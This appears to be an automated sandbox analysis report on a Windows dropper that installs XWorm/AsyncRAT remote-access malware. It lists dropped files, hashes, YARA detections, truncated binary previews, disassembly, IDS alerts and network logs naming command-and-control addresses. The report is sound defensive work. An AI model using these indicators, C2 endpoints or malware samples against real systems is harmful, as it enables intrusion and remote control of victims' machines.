                                                                                                                                                                                                    MD5:61AC4C10C25A99BF2169DFA8059105D0
                                                                                                                                                                                                    SHA1:CEE4073D2FB36C42C2118406580E7DCB54A04EA0
                                                                                                                                                                                                    SHA-256:6E60B247338124F045B193447EA1C9A60A3DEAEB75577CA7CDDA3EF817DA2E1B
                                                                                                                                                                                                    SHA-512:F8E3B6EB7A09CD3156B4B1F994CCCAD16205C903F8B062A581F4FC879348762F09EED094E0B6B08457CC52E5261A6F6B6FE404972077926878E8BF62363B2765
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:L..................F.... ........S.......S.......S...H........................:..DG..Yr?.D..U..k0.&...&.......y.Yd...;.i.S..`....S......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Ye...........................d...A.p.p.D.a.t.a...B.V.1......Yb...Roaming.@......EW)B.Yb.............................x.R.o.a.m.i.n.g.....l.2..H...Y.. .SYSTEM~1.EXE..P......Y...Y.............................N..S.y.s.t.e.m. .U.s.e.r...e.x.e.......^...............-.......]...........G.QI.....C:\Users\user\AppData\Roaming\System User.exe........\.....\.....\.....\.....\.S.y.s.t.e.m. .U.s.e.r...e.x.e.`.......X.......179605...........hT..CrF.f4... .yS......,...E...hT..CrF.f4... .yS......,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\System User.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):83968
                                                                                                                                                                                                    Entropy (8bit):6.0557840174909385
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:S2q2+SuMeXA5gBQsGQ17zcaIcbml5eUwqo/wc/D6X0i3KOOtJHcA+:SV23ua0VKcbml5vje/Zi3FOtJ/+
                                                                                                                                                                                                    MD5:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    SHA1:400525C81A140BEB77C035C95480D40B64496F8E
                                                                                                                                                                                                    SHA-256:68A5C3157A890D65AE1836EF3794A757D9F1F06559CCF174E7B0E6293ADA8925
                                                                                                                                                                                                    SHA-512:967E096C8091968CE0B2D53DFF0632B0CDC34D8B11E34C7F5CE8CEDD853D860F059E51318ECFD564BA0545A4304AFCCC8B4567BE777A2D55BB4C761E91F1F8DA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: ditekSHen
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g.................>...........\... ...`....@.. ....................................@.................................d\..W....`............................................................................... ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B.................\......H........b..........&.....................................................(....*.r...p*. .x!.*..(....*.r...p*. ..A.*.s.........s.........s.........s.........*.r...p*. .+u.*.rV..p*. j...*.r...p*. }&..*.r...p*. S...*.ro..p*. *p{.*..((...*.r...p*. ...*.r...p*. +.).*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rp..p*. ~.H.*.r...p*. ....*.r...p*. ..?.*.rk..p*. ..e.*.r...p*.r...p*.rf..p*.r...p*. ..

                                                                                                                                                                                                    C:\Users\user\Desktop\DISCORD

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):103
                                                                                                                                                                                                    Entropy (8bit):4.081427527984575
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
                                                                                                                                                                                                    MD5:B016DAFCA051F817C6BA098C096CB450
                                                                                                                                                                                                    SHA1:4CC74827C4B2ED534613C7764E6121CEB041B459
                                                                                                                                                                                                    SHA-256:B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
                                                                                                                                                                                                    SHA-512:D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

                                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                    Entropy (8bit):4.37224651035039
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:tFVfpi6ceLP/9skLmb0qyWWSPtaJG8nAge35OlMMhA2AX4WABlguNtiL:7V18yWWI/glMM6kF7Pq
                                                                                                                                                                                                    MD5:0F0113D63B19434A9E16332268EDFFB1
                                                                                                                                                                                                    SHA1:568521B5DB7B81D25D1EEB495ECBE47D2F89CEE0
                                                                                                                                                                                                    SHA-256:6B627B482306A0F7F068F668AF9BD4F479E577DDDCCEC0B15831F99DA5AC70CD
                                                                                                                                                                                                    SHA-512:4C203A0512F435E53E36551E9D61CD81979604B5EF704C91141CB71E499E1EBCA080070FB48B13B69AB14616740819C70EB37171B1B1E2B30D08BB8A6735D864
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.{.x.S..............................................................................................................................................................................................................................................................................................................................................Ur.L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    \Device\ConDrv

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    File Type:ISO-8859 text, with CRLF, LF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):571
                                                                                                                                                                                                    Entropy (8bit):4.9398118662542965
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
                                                                                                                                                                                                    MD5:5294778E41EE83E1F1E78B56466AD690
                                                                                                                                                                                                    SHA1:348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
                                                                                                                                                                                                    SHA-256:3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
                                                                                                                                                                                                    SHA-512:381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
                                                                                                                                                                                                    Preview:.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):7.983672506604139
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                    File name:YgJ5inWPQO.exe
                                                                                                                                                                                                    File size:7'714'025 bytes
                                                                                                                                                                                                    MD5:abbb4a5a77f9cf1530d24710a621026c
                                                                                                                                                                                                    SHA1:a8b3f3d965202dfd6b7a9cc10963c0cfccf35682
                                                                                                                                                                                                    SHA256:fdd53599267201df460d004d399609274c7f0ba5342004d5c73e817f33a670a2
                                                                                                                                                                                                    SHA512:d7018660bc562a089b28b4d28424dc4e82c862cd90917ecd7e2de89aa283c2e66a909d7e50b2bb492dd741aee54878c1f5b64eeebe7e4ac1ce45031e2ef0bcd1
                                                                                                                                                                                                    SSDEEP:196608:5RKqV783kdaXMCHGLLc54i1wN+DrRRu7NtbFRKnZMZDYhmh1wlxN8:XKqV7/cXMCHWUj7rRQ7XbFsn6ZUEWN
                                                                                                                                                                                                    TLSH:AE76231503E110FBDF62063CF4E0AA35C1FC6AE56B61CEC6ABB45566EE23ACC59E4D10
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:f0e1d4f0d0e972c7

                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Entrypoint:0x14000ce20
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                    Time Stamp:0x6764E65D [Fri Dec 20 03:37:01 2024 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                    call 00007FB28D049CBCh
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                    jmp 00007FB28D0498DFh
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                    call 00007FB28D04A088h
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    je 00007FB28D049A83h
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    mov eax, dword ptr [00000030h]
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                    jmp 00007FB28D049A67h
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                                                    je 00007FB28D049A76h
                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                    jne 00007FB28D049A50h
                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                    jmp 00007FB28D049A59h
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                    test ecx, ecx
                                                                                                                                                                                                    jne 00007FB28D049A69h
                                                                                                                                                                                                    mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                    call 00007FB28D0491B5h
                                                                                                                                                                                                    call 00007FB28D04A4A0h
                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                    jne 00007FB28D049A66h
                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                    jmp 00007FB28D049A76h
                                                                                                                                                                                                    call 00007FB28D056FBFh
                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                    jne 00007FB28D049A6Bh
                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                    call 00007FB28D04A4B0h
                                                                                                                                                                                                    jmp 00007FB28D049A4Ch
                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    inc eax
                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                                                    cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                    mov ebx, ecx
                                                                                                                                                                                                    jne 00007FB28D049AC9h
                                                                                                                                                                                                    cmp ecx, 01h
                                                                                                                                                                                                    jnbe 00007FB28D049ACCh
                                                                                                                                                                                                    call 00007FB28D049FFEh
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    je 00007FB28D049A8Ah
                                                                                                                                                                                                    test ebx, ebx
                                                                                                                                                                                                    jne 00007FB28D049A86h
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                    call 00007FB28D056DB2h

                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x399a8.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x810000x764.reloc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                    Sections

                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rdata0x2b0000x12a280x12c0071826b47a5757e783ac2554e4fac4d07False0.5242838541666667data5.750761883018192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                    .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rsrc0x470000x399a80x39a002a222210866bf01a9ffa2603a48d267cFalse0.6296646217462039data6.62301529999922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .reloc0x810000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                    Resources

                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                    RT_ICON0x472680x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7278368794326241
                                                                                                                                                                                                    RT_ICON0x476d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.6729508196721311
                                                                                                                                                                                                    RT_ICON0x480580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6308630393996247
                                                                                                                                                                                                    RT_ICON0x491000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.566597510373444
                                                                                                                                                                                                    RT_ICON0x4b6a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.5219059990552669
                                                                                                                                                                                                    RT_ICON0x4f8d00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 207360.5018022181146026
                                                                                                                                                                                                    RT_ICON0x54d580x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 368640.46457851587134746
                                                                                                                                                                                                    RT_ICON0x5e2000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.43163669703064
                                                                                                                                                                                                    RT_ICON0x6ea280x119eaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0001385617292504
                                                                                                                                                                                                    RT_GROUP_ICON0x804140x84data0.7272727272727273
                                                                                                                                                                                                    RT_MANIFEST0x804980x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                    Imports

                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                    COMCTL32.dll
                                                                                                                                                                                                    KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                    GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                    2024-12-20T19:03:21.950129+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849707104.21.93.27443TCP
                                                                                                                                                                                                    2024-12-20T19:05:22.723190+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849838147.185.221.1835710TCP

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.241172075 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.241245985 CET44349704104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.241395950 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.265434027 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:16.265454054 CET44349704104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:17.486840010 CET44349704104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:17.486949921 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:17.499360085 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:17.499391079 CET44349704104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:17.499696970 CET44349704104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:17.546314955 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:17.656372070 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:17.699340105 CET44349704104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:18.004667044 CET44349704104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:18.004759073 CET44349704104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:18.004812956 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:18.025722027 CET49704443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:19.098551035 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:19.218533039 CET8049706208.95.112.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:19.218667030 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:19.219291925 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:19.338857889 CET8049706208.95.112.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:20.257213116 CET49707443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:20.257266998 CET44349707104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:20.257364988 CET49707443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:20.259417057 CET49707443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:20.259437084 CET44349707104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:20.315226078 CET8049706208.95.112.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:20.358786106 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.482506037 CET44349707104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.482604980 CET49707443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.510457039 CET49707443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.510478973 CET44349707104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.511512995 CET44349707104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.512876034 CET49707443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.555370092 CET44349707104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.950257063 CET44349707104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.950609922 CET44349707104.21.93.27192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.950668097 CET49707443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:21.951014042 CET49707443192.168.2.8104.21.93.27
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.297492027 CET49708443192.168.2.8128.116.123.3
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.297543049 CET44349708128.116.123.3192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.297719002 CET49708443192.168.2.8128.116.123.3
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.298190117 CET49708443192.168.2.8128.116.123.3
                                                                                                                                                                                                    Dec 20, 2024 19:03:22.298201084 CET44349708128.116.123.3192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:23.883888960 CET44349708128.116.123.3192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:23.883975029 CET49708443192.168.2.8128.116.123.3
                                                                                                                                                                                                    Dec 20, 2024 19:03:23.888123989 CET49708443192.168.2.8128.116.123.3
                                                                                                                                                                                                    Dec 20, 2024 19:03:23.888138056 CET44349708128.116.123.3192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:23.888529062 CET44349708128.116.123.3192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:23.889658928 CET49708443192.168.2.8128.116.123.3
                                                                                                                                                                                                    Dec 20, 2024 19:03:23.931349993 CET44349708128.116.123.3192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:24.585665941 CET44349708128.116.123.3192.168.2.8
